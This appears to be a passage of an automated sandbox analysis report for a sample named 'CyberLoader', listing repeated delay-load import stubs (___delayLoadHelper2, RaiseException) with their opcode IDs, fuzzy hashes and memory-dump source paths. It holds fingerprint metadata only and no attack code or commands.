                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bcb0cabc9a6969dc616f566f10fc78f05f91fa3a6d9f92ee5100685ddbccdb90
                                                  • Instruction ID: 9d7198be2c73c7dcca617a98b2c31a024ed9e4c7d15bc077696e48263887159d
                                                  • Opcode Fuzzy Hash: bcb0cabc9a6969dc616f566f10fc78f05f91fa3a6d9f92ee5100685ddbccdb90
                                                  • Instruction Fuzzy Hash: 8EB0129D27E001AD310C71066C02E3E035CC0E5B11330C51BF109C01C9D8804C3D9E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 45747c3c86d6499c829616f032c8cdf3ca565665e80d1be3d3bc5e590238a433
                                                  • Instruction ID: f42eea0f785417fb5ce7d4fda9607767efc0940ebf24b60eec9768fac761e10c
                                                  • Opcode Fuzzy Hash: 45747c3c86d6499c829616f032c8cdf3ca565665e80d1be3d3bc5e590238a433
                                                  • Instruction Fuzzy Hash: 64B0129D2BE101AE310C71066C02E3A035CD0E2B12330811BF009C01C5D8804C3C9F31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 211d5baa6fa3438cf32987d4d0f62d0664e2dfa612f50bc89d9c9f605263535c
                                                  • Instruction ID: 11f93efcdb400f3326f92e4e5e68aa380cb340953330d724f0c9562779a850d8
                                                  • Opcode Fuzzy Hash: 211d5baa6fa3438cf32987d4d0f62d0664e2dfa612f50bc89d9c9f605263535c
                                                  • Instruction Fuzzy Hash: D3B0929927A002AD3218710429069360368C0A5B11320841BB50AC11C1D9804C2D9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 86dbd8719a1e6a18d6c168509e72e60fd97c6500397dbb9ff877326ff884d6cb
                                                  • Instruction ID: 092ac73a315ee19fe7739b9d731c949b49e37718c8f59d10b81aa8d71c265cea
                                                  • Opcode Fuzzy Hash: 86dbd8719a1e6a18d6c168509e72e60fd97c6500397dbb9ff877326ff884d6cb
                                                  • Instruction Fuzzy Hash: B8B0129D37E042AD311C71042E07D37036CC0E9B11330841BF20AC01C1DD814C3E9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8662d06767c64cf748c9df6855c0de50058da6ae7bd7228b3d59a61d5e19c855
                                                  • Instruction ID: bdef300bdb710e5e63fcbc03c238cdc78d3c061ab1458213aa4da620262ace3d
                                                  • Opcode Fuzzy Hash: 8662d06767c64cf748c9df6855c0de50058da6ae7bd7228b3d59a61d5e19c855
                                                  • Instruction Fuzzy Hash: 5BB0129D37E106BD321831002D07C37032CC0E1B11330452BF106D00C1DD804C7D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 71e322d2f92e3098bf5e67ae2662c519f479338b54d1581438e0f0fcfc46ee12
                                                  • Instruction ID: a7c5d6717a0196d9925e0e200c11c26da513eedd85be878a5ec272e2c291bddc
                                                  • Opcode Fuzzy Hash: 71e322d2f92e3098bf5e67ae2662c519f479338b54d1581438e0f0fcfc46ee12
                                                  • Instruction Fuzzy Hash: 28B0129D37E001AD311871142D07E36036CD0F5B11330842BF10BD05C1DD804C3D9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 897f1eeed49c25f16189ccf93593946b9e8c9d9d2d2b1615073f47673044a922
                                                  • Instruction ID: dd5fb0660b011a077a8a80d54b4e596eca9054e0852af6f960fe8c4de6f46071
                                                  • Opcode Fuzzy Hash: 897f1eeed49c25f16189ccf93593946b9e8c9d9d2d2b1615073f47673044a922
                                                  • Instruction Fuzzy Hash: 95B0929927A201AD210831106A12936032CC1D1B11320861BF209A00C2A9809C6CA531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 56cbc9c391f88a5974f7b27146f0e8573cc040fcac0896fdd9e3ef78c6916f87
                                                  • Instruction ID: 42303275d729f791ea750f1a04b31948396aab5806dfed0a32dd8b8c56341d25
                                                  • Opcode Fuzzy Hash: 56cbc9c391f88a5974f7b27146f0e8573cc040fcac0896fdd9e3ef78c6916f87
                                                  • Instruction Fuzzy Hash: BAB0929927A202AD310871146912A36036CC0D1B10320851BF20DD11C2E9809C2C9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 41ce369bfa6126703199c2cf3c11f67df6ec2969c3d57900bdb7d32eb487d47e
                                                  • Instruction ID: af42893d4ad725d47112790551c262c26e9147fdc9bf365c0e9824f9d4074f83
                                                  • Opcode Fuzzy Hash: 41ce369bfa6126703199c2cf3c11f67df6ec2969c3d57900bdb7d32eb487d47e
                                                  • Instruction Fuzzy Hash: 09B0929927A101AD210871146912A36036CC0D6B10320851BF60DD11C2E9809C2C9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ee1dec5cfd25aeb2bcfde788eb3562698ecd0483adb7f4e4e317827a82224cdf
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: ee1dec5cfd25aeb2bcfde788eb3562698ecd0483adb7f4e4e317827a82224cdf
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: dbb97e40cb476801744c53f06ada554466e7cdff049247ef1e688a27ef2d95dc
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: dbb97e40cb476801744c53f06ada554466e7cdff049247ef1e688a27ef2d95dc
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ba0233abc1685bce0fb1cb50e26c15bf8861c32ac853aec0939e63f3970a618e
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: ba0233abc1685bce0fb1cb50e26c15bf8861c32ac853aec0939e63f3970a618e
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bc1e35f27f153be33f2ac28d332439fe43a2ea8fa048f77698cb3c68873ca794
                                                  • Instruction ID: 8441cda10caa977b1d5858a29230be926567653586d83f1bb13ffe82783c07a5
                                                  • Opcode Fuzzy Hash: bc1e35f27f153be33f2ac28d332439fe43a2ea8fa048f77698cb3c68873ca794
                                                  • Instruction Fuzzy Hash: BEA0129D27E4013C300C7102AC02C3A031CC0D1B11330410AF006900C59880083C5D30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 33715534598e948d482d53df383383f9b350992de1ea800e94761f7a1e190479
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 33715534598e948d482d53df383383f9b350992de1ea800e94761f7a1e190479
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 96c6f231d0c90dacc462945f3bc417c24e16b2d26f289ec1951206c4544ec5ea
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 96c6f231d0c90dacc462945f3bc417c24e16b2d26f289ec1951206c4544ec5ea
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 06220b712181acd60e447b0d9123339114c10f93d43b68fb667c347bf0019f98
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 06220b712181acd60e447b0d9123339114c10f93d43b68fb667c347bf0019f98
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 902862af57f22e49a72d44bba79d7124794df6fb8fc971b8882345d0e50fa8b2
                                                  • Instruction ID: 74986337a7aa554708c5703a6e764f21617e75587c179ca6af55458aa8ba13c8
                                                  • Opcode Fuzzy Hash: 902862af57f22e49a72d44bba79d7124794df6fb8fc971b8882345d0e50fa8b2
                                                  • Instruction Fuzzy Hash: 34A001AE2BE502BD311D7252AD16D3A076CC4D6BA13308A5AF50A944CAA984587DAE31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8bfaa22cae5895703d65e24d680bbfde41245f615943f3d2728e8c0854c3cbed
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 8bfaa22cae5895703d65e24d680bbfde41245f615943f3d2728e8c0854c3cbed
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 308daeeb6d122119508f46d8751d4689f3f8ecae24409d54f5ba350e92c25da1
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 308daeeb6d122119508f46d8751d4689f3f8ecae24409d54f5ba350e92c25da1
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 619687285b5ee0104ce8a979176eb014e01836dd65786c8001613083b4621be7
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: 619687285b5ee0104ce8a979176eb014e01836dd65786c8001613083b4621be7
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ed5eddb2bbaf76a2fd4eeae3afa411525d26582579bb701ccd171c57c4c74d91
                                                  • Instruction ID: b58425748e9266da1fb8ee35fd4d3ac217f1be72d63332ea5aa194ddfbf9089b
                                                  • Opcode Fuzzy Hash: ed5eddb2bbaf76a2fd4eeae3afa411525d26582579bb701ccd171c57c4c74d91
                                                  • Instruction Fuzzy Hash: 92A0129D27E0027C301831002D07C36032CC0C5B103304809F107800C19D800C2D5530
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
